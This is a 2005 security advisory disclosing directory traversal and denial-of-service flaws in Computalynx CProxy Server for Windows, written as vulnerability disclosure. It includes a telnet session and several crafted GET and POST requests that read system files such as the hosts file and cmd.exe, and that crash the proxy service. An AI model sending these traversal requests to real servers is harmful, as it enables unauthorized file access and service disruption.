+=========================================================================================+ | Security Advisory: Computalynx CProxy Server Multiple Remote Vulnerabilities | +=========================================================================================+ | kristof.philipsen@ubizen.com March 02, 2005 | +=========================================================================================+ AFFECTED PRODUCTS Affected Software: - Computalynx CProxy 3.3.x for Win32 - Computalynx CProxy 3.4.x (3.4.4 inclusive) for Win32 Possibly other software versions are affected. IDENTIFIED ISSUES The following issues were found to affect the aforementioned Computalynx CProxy Server software: [1] Directory Traversal and Arbitrary File Access Attack [2] Denial-of-Service Attack BRIEF DESCRIPTION Computalynx CProxy is a Windows platform based proxy server featuring HTTP, Telnet, POP3, SMTP, FTP proxy functions, as well as Anti Virus and Content Filtering capabilities. Because of inadequate input validation, a malicious attacker can perform a directory traversal attack and thus gain access to arbitrary files located on the CProxy Server system. Moreover, using the same attack vector with especially crafted HTTP requests, it is possible to crash the CProxy service running on the remote system. DETAILED DESCRIPTION Computalynx CProxy Server is a multifunctional Windows platform based proxy server with multi- protocol support. When performing proxy functions, CProxy Server is vulnerable to a directory traversal attack. Inadequate input validation and input filtering allows a remote attacker to gain attack to arbitrary files on the Windows system upon which the CProxy Server software has been deployed. This first issue of directory traversal lies within the fact that the CProxy Server fails to filter out double dot attacks and in turn fails to protect arbitrary files from being requested and opened using the proxy service. An especially crafted URL allows allows arbitrary files to be recovered from the system. The retrieval of system files can compromise the entire system or expose the system to further avenues of attack. A malicious attacker can perform a request using the following format to gain access to arbitrary data: GET http:/// HTTP/1.0 An attacker can gain access to a file in the WINNT directory as shown in the following example, by connecting to CProxy Server's proxy service (listening on TCP port 8080 by default), and executing the following request: ronin[kris] ~ $ telnet 10.0.0.1 8080 Trying 10.0.0.1... Connected to 10.0.0.1. Escape character is '^]'. GET http://../../../../../winnt/system32/drivers/etc/hosts HTTP/1.0 HTTP/1.0 200 OK Content-length: 734 Date: Sat, 19 Feb 2005 21:09:58 GMT Date: Sat, 19 Feb 2005 21:09:58 GMT # Copyright (c) 1993-1999 Microsoft Corp. # # This is a sample HOSTS file used by Microsoft TCP/IP for Windows. # # This file contains the mappings of IP addresses to host names. Each # entry should be kept on an individual line. The IP address should # be placed in the first column followed by the corresponding host name. # The IP address and the host name should be separated by at least one # space. # # Additionally, comments (such as these) may be inserted on individual # lines or following the machine name denoted by a '#' symbol. # # For example: # # 102.54.94.97 rhino.acme.com # source server # 38.25.63.10 x.acme.com # x client host 127.0.0.1 localhost Connection closed by foreign host. In conjunction with this method, other HTTP methods such as "POST" and "HEAD", will also lead to arbitrary file retrieval. When retrieving an arbitrary ASCII file using the "GET" method, causes the file to be displayed and immediately afterwards causes the CProxy Server service to crash with an error message indicating that "memory could not be read". However, when retrieving this same ASCII file using the "POST" or "HEAD" methods will cause the file contents to be displayed and does not crash the CProxy Server service, allowing an attacker to execute multiple requests and thus allowing various arbitrary files to be retrieved from the CProxy Server system. * The following request will cause the arbitrary file to be displayed: -> "POST http://../../../../../winnt/system32/drivers/etc/hosts HTTP/1.0" * The following request will cause the arbitrary file to be displayed and the CProxy Server service to crash: -> "GET http://../../../../../winnt/system32/drivers/etc/hosts HTTP/1.0" When attempting to retrieve an executable file using any of these HTTP methods ("GET","HEAD", or "POST"), in the aforementioned manner, will cause the contents of the executable file contents to be displayed and the CProxy Server service to crash with an error message that "memory could not be read", rendering the service unavailable, thus resulting in a Denial-of-Service condition. * Both of the following requests will cause the arbitrary executable's contents to be displayed and the CProxy Server service to crash: -> "GET http://../../../../../winnt/system32/cmd.exe" -> "POST http://../../../../../winnt/system32/cmd.exe" CHARACTERISTICS * Inadequate input validation and filtering allows an attacker to perform directory traversal attacks against the systems running Computalynx CProxy Server. * Different vectors of attack allow retrieval of arbitrary and possibly sensitive files from the system running Computalynx CProxy Server. * Use of especially crafted URL's allow attackers to render to service unavailable, causing a Denial-of-Service condition. SEVERITY Each of these two issues affecting Computalynx CProxy Server software can directly or indirectly allow partial or complete compromise of the system and/or the data stored on the system running the CProxy Server software. Moreover, the second issue regarding a Denial-of-Service attack against the CProxy Server software will directly affect any users depending on the availability of the functions which the CProxy Software performs on this system. Classification: MEDIUM to HIGH VENDOR STATUS 19/Feb/2005 - Computalynx contacted regarding this issue. 02/Mar/2005 - At present, the vendor has not replied regarding this issue. SOLUTION * Currently awaiting vendor status for a solution regarding this issue. * A mitigation strategy against attacks of this nature would be to ensure that remote connections to the CProxy Server are not authorised (i.e. through the use of proper firewall rules). REFERENCES [1] "Computalynx Software" - http://www.computalynx.com -- Kristof Philipsen Security Engineer Ubizen - a Cybertrust company 18 rue Robert Stumper L-2557 Luxembourg Luxembourg T: +352 26 31 05 85 F: +352 26 31 05 86 E-mail: kristof.philipsen@ubizen.com www.ubizen.com - www.cybertrust.com